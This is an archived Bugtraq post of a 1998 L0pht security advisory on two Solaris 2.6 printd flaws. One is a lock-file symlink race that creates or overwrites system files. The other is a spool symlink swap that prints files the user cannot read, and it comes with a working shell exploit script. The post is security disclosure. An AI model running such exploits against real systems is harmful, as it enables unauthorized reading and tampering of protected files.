Bugtraq mailing list archives
Solaris printd security vulnerability
From: aleph1 () dfw net (Aleph One)
Date: Wed, 11 Mar 1998 11:23:44 -0600
`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`
L0pht Security Advisory
Document: L0pht Security Advisory
URL Origin: http://www.l0pht.com/advisories.html
Release Date: February 23, 1998
Application: printd (lp)
Operating Sys: Solaris 2.6
Severity: Users can overwrite/create system files
Users can print unreadable files
Author: silicosis <sili () l0pht com>
Patch Status: Sun has been made aware of the vulnerabilities
3 weeks ago and still has not released a patch.
`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`
Create/Overwrite Files:
Sun hasn't learned from it's past mistakes; temp files are still a
problem this time it's with 'printd' (lp). Upon printing a large file
that sits in the queue for ~1minute, a lock file (/tmp/.printd.lock) is
created. Before you print something large, create a symlink pointing to
the /tmp/.printd.lock towards something you'd like to create/overwrite.
When printd is done, the file your pointing to will have mode 640, and
the contents will contain printd's pid.
``````````````````````````
Printing unreadable files:
Sun has restructured their print spooling in Solaris 2.6. They've
gone over to a queueing system that's similar to sendmail:
[~]lp .tcshrc
[~]ls -al /var/spool/print
total 12
drwxr-xr-x 2 root lp 512 Feb 20 12:44 .
drwxrwxr-x 10 root bin 512 Feb 17 11:28 ..
-rw-rw-r-- 1 root staff 4 Feb 20 12:44 .seq
-rw-r----- 1 root staff 80 Feb 20 12:44 cfA037core
lrwxrwxrwx 1 root staff 19 Feb 20 12:44 dfA037core ->
/home/sili/.tcshrc
-rw-r----- 1 root staff 23 Feb 20 12:44 xfA037core
You have your control, transfer and datafiles. The datafile is just
a symlink to the file you printed, so if you link the file you printed
to something else *before* the queue is flushed, printd will print it.
A simple exploit script:
----[CUT HERE: sol26lp]----
#!/bin/sh
#
#Print unreadable files on solaris2.6
#sili () l0pht com
#
# --If it didn't work, change $BIGFILE to
# something bigger.
#
# --Script usually works 80% of the time..
# Didn't work? Try again.. Throw something
# at the printspooler to slow it down.
#
TMPFILE="./.dmlr"
BIGFILE="/usr/lib/libc.so.1"
if [ $# != 1 ]; then
echo "Usage:"
echo
echo "./sol26lp <file>"
echo
echo "Print unreadable files on Solaris2.6"
echo " ----sili () l0pht com"
exit 1
fi
echo "Need a large file to print, using $BIGFILE."
cp /usr/bin/vi $TMPFILE ; chmod 700 $TMPFILE
lp $TMPFILE ;
#sleep 1;
rm $TMPFILE ; ln -s $1 $TMPFILE
QF=`ls -al /var/spool/print |grep $TMPFILE |awk '{print $9}'`
echo "Queue File: /var/spool/print/$QF"
while [ -h /var/spool/print/$QF ]; do
echo "Waiting for file to print";
sleep 1;
done
echo "File printed. Erasing temp files."
rm $TMPFILE
echo "Done."
echo
echo " --sili () l0pht com 1/20/98"
----[CUT HERE: sol26lp]----
Current thread:
- Security problem in Slackware., (continued)
- Security problem in Slackware. Suman_Saraf (Mar 11)
- Re: Security problem in Slackware. Peter van Dijk (Mar 13)
- /tmp event logger Michal Zalewski (Mar 14)
- Re: /tmp event logger Theo de Raadt (Mar 15)
- Vunerable shell scripts Michal Zalewski (Mar 14)
- More broadcast fun T. Freak (Mar 14)
- Midnight Commander /tmp race Michal Zalewski (Mar 15)
- Re: Midnight Commander /tmp race Pavel Kankovsky (Mar 17)
- Re: Midnight Commander /tmp race willy () SNOWYOWL CSU AC RU (Mar 17)
- Re: Midnight Commander /tmp race Pavel Kankovsky (Mar 18)
- Solaris printd security vulnerability Aleph One (Mar 11)
- Sun Security Bulletin #00165 Aleph One (Mar 11)
- Fwd: Sun Security Bulletin #00166 Tony Hagale (Mar 11)
- SLMail 2.6 DoS Steven (Mar 11)
- SLMail 2.6 DoS - Imail also Jon (Mar 11)
- Winsock 2.0 DoS John Robinson (Mar 11)
- Re: Winsock 2.0 DoS Henri Karrenbeld (Mar 12)
- more testing of Winsock 2.0 DoS Velocet (Mar 12)
- Re: Winsock 2.0 DoS stevep () ee pdx edu (Mar 12)
- InfoSecurity News jericho () DIMENSIONAL COM (Mar 13)
- Chase Bank joey.wheel (Mar 13)